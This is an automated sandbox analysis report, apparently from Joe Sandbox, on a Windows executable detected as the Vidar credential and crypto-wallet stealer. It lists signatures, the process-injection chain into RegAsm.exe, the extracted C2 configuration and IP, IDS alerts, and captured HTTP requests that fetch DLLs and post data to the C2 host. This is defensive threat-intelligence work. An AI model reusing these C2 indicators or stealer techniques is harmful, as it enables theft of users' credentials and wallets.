Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1519637
MD5: 2cce29d734ea1d227b338834698e2de4
SHA1: 41700cd1bcf5f5bcca81ce722ed47fc17bd030c2
SHA256: f75acf936390f89239c43552717efb65c4c3190b16a7eec62dcd0053a045e91d
Tags: exe, user-Bitsight

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 6128 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2CCE29D734EA1D227B338834698E2DE4)
    • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 6508 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "e90840a846d017e7b095f7543cdf2d15"}
Yara matches (PCAP):
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Yara matches (memory dumps):
Source | Rule | Description | Author | Strings
00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
(8 further entries not shown)

Yara matches (unpacked PEs):
Source | Rule | Description | Author | Strings
2.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
2.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
0.2.file.exe.3fe5570.2.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.file.exe.3fe5570.2.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
0.2.file.exe.3fe5570.2.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
(3 further entries not shown)

No Sigma rule has matched
Suricata alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-26T19:05:29.150702+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49716 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:30.312845+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49717 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:31.702222+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49718 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:33.104487+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49719 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:34.982172+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49720 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:36.445705+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49721 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:37.445668+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49722 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:40.833080+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49723 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:41.609248+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49724 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:42.783781+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49725 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:43.973906+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49726 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:45.731071+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49727 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:47.499648+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49728 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:49.080817+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49729 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:50.522089+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49730 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:51.810151+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49731 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:54.892995+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49732 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:56.180974+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49733 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:57.843408+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49734 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:59.292302+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49735 | 5.75.211.162 | 443 | TCP
2024-09-26T19:06:01.413460+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49736 | 5.75.211.162 | 443 | TCP
2024-09-26T19:06:03.295823+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49738 | 5.75.211.162 | 443 | TCP
2024-09-26T19:05:33.812539+0200 | 2044247 | 1 | Malware Command and Control Activity Detected | 5.75.211.162 | 443 | 192.168.2.5 | 49719 | TCP
2024-09-26T19:05:35.680099+0200 | 2051831 | 1 | Malware Command and Control Activity Detected | 5.75.211.162 | 443 | 192.168.2.5 | 49720 | TCP
2024-09-26T19:05:35.679915+0200 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.5 | 49720 | 5.75.211.162 | 443 | TCP
2024-09-26T19:06:06.929545+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49739 | 172.105.54.160 | 443 | TCP

                        AV Detection

Source: https://5.75.211.162/mozglue.dll | Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869/badges | Avira URL Cloud: Label: malware
Source: https://5.75.211.162/freebl3.dll | Avira URL Cloud: Label: malware
Source: https://5.75.211.162/vcruntime140.dll | Avira URL Cloud: Label: malware
Source: https://5.75.211.162 | Avira URL Cloud: Label: malware
Source: https://t.me/ae5ed | Avira URL Cloud: Label: malware
Source: https://5.75.211.162/softokn3.dll6V#~ | Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869/inventory/ | Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869 | Avira URL Cloud: Label: malware
Source: https://5.75.211.162/xmx~3 | Avira URL Cloud: Label: malware
Source: https://5.75.211.162/softokn3.dll | Avira URL Cloud: Label: malware
Source: https://5.75.211.162/sqlp.dll | Avira URL Cloud: Label: malware
Source: https://5.75.211.162/msvcp140.dll | Avira URL Cloud: Label: malware
Source: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "e90840a846d017e7b095f7543cdf2d15"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree | 2_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 2_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA | 2_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA | 2_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_6C0A6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer | 2_2_6C0A6C80
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.105.54.160:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr
                        Source: Binary string: freebl3.pdb source: RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                        Source: Binary string: freebl3.pdbp source: RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                        Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr
                        Source: Binary string: c:\rje\tg\obj\Release\ojc.pdb source: file.exe
                        Source: Binary string: softokn3.pdb@ source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000002.00000002.3315681328.000000003AE07000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000002.00000002.3310118998.000000002EF2B000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
                        Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmp
                        Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr
                        Source: Binary string: softokn3.pdb source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose | 2_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose | 2_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 2_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 2_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 2_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose | 2_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA | 2_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose | 2_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 2_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA | 2_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose | 2_2_0040CD37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA | 2_2_00415142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr fs:[00000030h] | 2_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov dword ptr [ebp-04h], eax | 2_2_004014AD

                        Networking

Source: Network traffic | Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.5:49720 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.5:49720
Source: Network traffic | Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.5:49719
Source: Malware configuration extractor | URLs: https://steamcommunity.com/profiles/76561199780418869
Source: global traffic | HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 104.102.49.254
Source: Joe Sandbox View | IP Address: 5.75.211.162
Source: Joe Sandbox View | ASN Name: AKAMAI-ASUS
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49717 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49722 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49718 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49719 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49720 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49716 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49721 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49723 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49724 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49725 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49727 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49728 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49729 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49726 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49730 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49731 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49733 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49734 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49732 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49735 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49736 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49738 -> 5.75.211.162:443
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49739 -> 172.105.54.160:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AEGHIJEHJDHIDHIDAEHC | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Content-Length: 255 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AAAAKJKJEBGHJKFHIDGC | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JJDHIDBFBFHIJKFHCGIE | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBG | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Content-Length: 332 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IJDBGDGCGDAKFIDGIDBF | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Content-Length: 5765 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /sqlp.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFH | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Content-Length: 829 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EHDGIJJDGCBKFIDHIEBK | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DAEBKKKEHDHDGDGCFBKJ | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Connection: Keep-Alive | Cache-Control: no-cache
